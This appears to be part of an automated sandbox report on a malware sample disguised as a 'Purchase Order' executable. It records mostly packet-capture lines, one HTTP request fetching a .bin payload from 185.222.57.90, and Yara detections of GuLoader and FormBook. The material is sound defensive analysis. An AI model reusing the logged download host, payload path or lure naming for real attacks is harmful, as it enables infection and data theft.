                                            Nov 18, 2024 18:11:17.284161091 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284174919 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284190893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284218073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284431934 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284447908 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284473896 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284502983 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.284703970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.284754992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286096096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286159992 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286348104 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286366940 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.286389112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286417961 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.286997080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287014961 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287046909 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287062883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287341118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287357092 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287385941 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287403107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.287595034 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.287638903 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288760900 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288808107 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.288846970 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.288888931 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.330436945 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330501080 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.330549955 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.330621004 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398849010 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398885965 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398930073 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398955107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.398961067 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.398986101 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399194956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399209023 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399233103 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399255037 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399525881 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399538994 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399563074 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399580956 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.399971008 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.399986982 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.400007963 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.400029898 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401572943 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401617050 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401643991 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401676893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401698112 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.401732922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.401990891 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402004004 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402017117 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402034044 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402066946 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402486086 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402498960 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.402525902 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.402540922 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403898954 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.403939962 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.403973103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404007912 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404028893 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404063940 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.404205084 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.404239893 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445852995 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445892096 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.445925951 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.445969105 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514400959 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514453888 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514467001 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514554024 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514619112 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514759064 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514771938 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514786005 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.514816046 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.514841080 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.515275955 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515291929 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.515340090 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517086029 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517137051 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517232895 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517249107 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517291069 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517559052 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517573118 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517585039 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517586946 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.517602921 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.517621040 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.518296003 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518310070 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.518346071 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519368887 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519413948 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519493103 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519505024 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519534111 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519553900 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.519660950 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.519701958 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561665058 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561686993 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561703920 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.561781883 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.561841965 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629756927 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629812956 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629868031 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629880905 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.629914999 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.629935980 CET4971180192.168.2.8185.222.57.90
                                            Nov 18, 2024 18:11:17.630135059 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630153894 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630171061 CET8049711185.222.57.90192.168.2.8
                                            Nov 18, 2024 18:11:17.630181074 CET4971180192.168.2.8185.222.57.90
                                            • 185.222.57.90
                                            Session ID:0
                                            Source IP:192.168.2.8
                                            Source Port:49711
                                            Destination IP:185.222.57.90
                                            Destination Port:80
                                            PID:6892
                                            Process:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe

                                            Timestamp:Nov 18, 2024 18:11:15.523874044 CET
                                            Bytes transferred:175
                                            Direction:OUT
                                            Data:
                                            GET /zFSrvbrRquo53.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: 185.222.57.90
                                            Cache-Control: no-cache

                                            Timestamp:Nov 18, 2024 18:11:16.708092928 CET
                                            Bytes transferred:1236
                                            Direction:IN
                                            Data:
                                            HTTP/1.1 200 OK
                                            Content-Type: application/octet-stream
                                            Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                            Accept-Ranges: bytes
                                            ETag: "2aaa7eb21639db1:0"
                                            Server: Microsoft-IIS/10.0
                                            Date: Mon, 18 Nov 2024 17:11:16 GMT
                                            Content-Length: 290368



                                            Target ID:0
                                            Start time:12:10:08
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1990093739.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:5
                                            Start time:12:11:05
                                            Start date:18/11/2024
                                            Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                            Imagebase:0x400000
                                            File size:724'333 bytes
                                            MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true
